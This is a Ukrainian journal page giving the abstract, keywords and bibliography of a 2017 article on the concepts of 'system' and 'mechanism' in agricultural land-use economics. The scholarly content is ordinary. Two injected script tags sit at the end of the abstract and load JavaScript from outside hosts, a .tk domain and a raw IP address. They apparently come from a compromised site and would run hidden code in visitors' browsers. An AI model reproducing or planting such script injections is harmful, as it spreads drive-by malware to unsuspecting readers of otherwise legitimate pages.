ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 332.32
Економіка агропромислового виробництва

Система та механізм землекористування: наукова детермінація понятійного апарату / Мартин А.Г., Барвінський А.В., Тихенко Р.В. // Економіка АПК. - 2017. - № 11 - С. 32

Мета статті - встановити коректне співвідношення категорій «система» та «механізм», які широко використовуються у сфері економіки землекористування, обгрунтувати виключну роль еколого-економічного механізму в реалізації системного підходу до використання сільськогосподарських земель. У процесі дослідження використано методи: абстрактно-логічний, діалектичний і системного аналізу (теоретичні та методологічні узагальнення). Як елементи новизни визначено місце й роль механізму землекористування та його складових у системі раціонального сільськогосподарського землекористування. Теоретично досліджено можливості економічного стимулювання раціонального використання земельних ресурсів у забезпеченні збалансованого розвитку аграрного сектора економіки. За результатами дослідження обґрунтовано висновок, що в ринкових умовах найефективнішим засобом екологізації сільськогосподарського землекористування є економічний механізм, спрямований на стимулювання землекористувачів до екологічно безпечного та соціально орієнтованого ведення господарської діяльності. Бібліогр.: 26.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: механізм, система, економіка землекористування, категорії, інструмент, термінологія

Список використаних джерел

 1. Алаев Э.Б. Социально-экономическая география: понятийно-терминологический словарь / Э.Б. Алаев. - М.: Мысль, 1983. - 350 с.
 2. Бобров В.Я. Основи ринкової економіки і підприємництва / В.Я. Бобров. - К.: Вища шк., 2003. - 205 с.
 3. Буравльов Є.П. Безпека навколишнього середовища / Є.П. Буравльов. - К.: Урожай, 2004. - 320 с.
 4. Введение в философию: учеб. / И.Т. Фролов, Э.А. Араб-Оглы, Г.С. Арефьева и др. - В 2 ч. - М.: Политиздат, 1990. - Ч. 2. - 640 с.
 5. Гальчинський А. Глобальні трансформаційні концептуальні альтернативи / А. Гальчинський. - К.: Либідь, 2006. - 312 с.
 6. Горлачук В.В. Землекористування на межі тисячоліть / В.В. Горлачук, В.Г. В’юн, А.Я. Сохнич. - Львів: НВФ «Українські технології», 2001. - 130 с.
 7. Дерев’янко О.Г. Фінансово-кредитний механізм в системі стратегічного управління / О.Г. Дерев’янко // Фінанси України. - 1998. - № 7. - С. 28-34.
 8. Економічна теорія. Політекономія: підруч. ; за ред. В.Д. Базилевича. - К.: Знання, 2001. - 296 с.
 9. Економічний енциклопедичний словник ; за ред. С.В. Мочерного. - У 2-х т. - Львів: Світ, 2005. - Т.1. - 616 с.
 10. Занятость, безработица. Служба занятости. Толковый словарь терминов и понятий. - М.: Нива России, 1996. - 422 с.
 11. Згуровский М.З. Исследование социальных процессов на основе методологии системного анализа / М.З. Згуровский, А.В. Доброногов, Т.Н. Померанцева. - К.: Знание, 1997. - 126 с.
 12. Земельні ресурси України ; за ред. В.В. Медведєва, Т.М. Лактіонової. - Харків-Київ: Аграрна наука, 1998. - 150 с.
 13. Кульганік О.М. Теоретичні засади формування ефективного механізму соціально-економічного розвитку сільських територій / О.М. Кульганік // Наук. вісн. НАУ. - 2008. - № 120. - С. 311-317.
 14. Лавейкін М.І. Реформування системи землекористування в Україні / М.І. Лавейкін. - К.: РВПС України НАН України, 2000. - 376 с.
 15. Мазурок П.П. Історія економічних вчень у запитаннях та відповідях: навч. посіб. / П.П. Мазурок. - К.: Знання, 2004. - 188 с.
 16. Мартин А.Г. Генезис землеустрою та його понятійного апарату: ретроспективний аналіз та сучасне розуміння / А.Г. Мартин, Р.В. Тихенко // Землеустрій і кадастр. - 2006. - №1. - С. 16-26.
 17. Регіональна політика та механізм її реалізації ; за ред. М.І. Долішнього. - К.: Наук. книга, 2003. - 504 с.
 18. Словник іншомовних слів ; за заг. ред. О.С. Мельничука. - К.: Урожай, 1974. - 432 с.
 19. Сохнич А.Я. Проблеми використання і охорони земель в умовах ринкової економіки: моногр. / А.Я. Сохнич. - Львів: НВФ «Українські технології», 2002. - 252 с.
 20. Тихенко Р.В. Еколого-економічна ефективність землеустрою в умовах трансформації земельних відносин в Україні: моногр. / Р.В. Тихенко. - К.: Анва-прінт, 2010. - 208 с.
 21. Тихенко Р.В. Землеустрій як головний механізм формування еколого-безпечних агроекосистем у сучасних сільськогосподарських землекористуваннях / Р.В. Тихенко. // Інноваційна економіка. - №1(20). - 2011. - С. 10-13.
 22. Философский словарь ; под ред. И.Т. Фролова. - 4-е изд. - М.: Политиздат, 1981. - 446 с.
 23. Beatty M., Petersen G, Swindale L. Planning the uses and management of land. Agronomy monograph 21. Madison: American Society of Agronomy. - 1979. - 1028 p.
 24. Briggs D., Wyatt B. Rural land-use change in Europe. In: Whitby M. &amp; Ollershaw J. Land use and the European Environment. - London: Belhaven Press, 1988. - P. 7-25.
 25. Molen P.V.D., Silayo E.H., Tuladhar A.M. Land administration Policies and Systems // Comparative Study to Land Policy in 9 Countries in Africa and Asia. - Stockholm: FIG Working Week, 2008. - P.6.
 26. Lee J. Land resources and their use in the European Communities // Scientific basis for soil protection in the European Communities. - London: New York. - 1987. - P. 29-63.